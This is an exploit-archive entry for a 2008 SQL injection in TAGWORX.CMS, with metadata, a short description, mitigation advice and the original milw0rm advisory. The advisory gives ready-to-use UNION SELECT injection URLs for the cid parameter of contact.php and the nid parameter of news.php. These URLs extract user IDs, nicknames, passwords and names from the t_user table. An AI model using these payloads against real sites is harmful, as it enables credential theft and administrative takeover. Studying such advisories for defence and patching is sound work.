TAGWORX.CMS Remote SQL Injection Vulnerability

vendor:

TAGWORX.CMS

by:

dun

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: TAGWORX.CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TAGWORX.CMS Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in TAGWORX.CMS. The vulnerability is due to improper sanitization of user-supplied input to the 'cid' and 'nid' parameters of the 'contact.php' and 'news.php' scripts. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database, potentially resulting in the disclosure of sensitive information. The attacker can also leverage this vulnerability to gain administrative access to the application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.eu ]

 ##########################################################
 #  [ TAGWORX.CMS ]   Remote SQL Injection Vulnerability  #
 ##########################################################
 #
 # Script site: http://www.tagworx.net/
 # 
 # Vuln: 
 # -contact.php:
 # http://site.com/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--
 # or
 # http://site.com/contact.php?cid=-1+UNION+SELECT+1,2,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--
 # 	
 # -news.php: 
 # http://site.com/news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name)),5,6+from+t_user--
 #	 
 # table_name= t_user or l_user
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * sid_psycho * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-05-18]